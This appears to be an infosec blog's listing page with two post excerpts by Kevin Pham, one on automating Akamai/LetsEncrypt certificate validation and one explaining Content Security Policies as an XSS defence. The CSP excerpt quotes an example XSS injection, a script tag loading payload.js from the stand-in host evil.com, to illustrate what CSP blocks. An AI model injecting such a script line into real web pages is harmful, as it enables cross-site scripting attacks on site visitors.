a technical infosec blog

automtion concept

Automating Akamai / LetsEncrypt Cert Validation

CPS workflow if (document.querySelector('body').getAttribute('class') != "dark") { document.querySelectorAll('.mermaidspan').forEach(el = { el.innerHTML = '%%{init: {\u0027theme\u0027:\u0027base\u0027}}%%\ngraph TD;\n start[START] --\u003e A\n subgraph Updates To Certs Initiated\n A[Create certificate with all subdomains in Akamai CPS GUI] --\u003e\n B[Create Certificate Signing Request - CSR] --\u003e\n C[Submit CSR to LetsEncrypt]\n end\n\n subgraph Manual Validation -- very time consuming!\n C --\u003e\n D[List of DNS ACME Validation records returned] --\u003e\n E[Add each record by hand in the Akamai DNS GUI] --\u003e\n F[Wait an hour until LetsEncrypt validates ownership of domains] \n end\n\n subgraph Akamai Cert Provisioning System \n F --\u003e\n G[Retrieve certificates] --\u003e\n H[Push to Akamai staging] --\u003e\n I{Is always test\u003cbr\u003eon staging on?...

// Kevin Pham · May 5, 2021
Generating a CSP using a playwright script

Implementing Content Security Policies, The Easy Way.

What’s a CSP? One of the mitigating defenses for XSS attacks and Clickjacking attacks is a good Content Security Policy (CSP). While not a pancea, it can effectively limit the severity of any exploits by constraining the XSS payload size to the injection window, which is typically limited to a few characters. Instead of externally loading a payload like: <script src="https://evil.com/payload.js"/> the entire payload must be encoded in the script evaluation window, effectively preventing nasty frameworks like BeEF from being loaded....

// Kevin Pham · May 4, 2021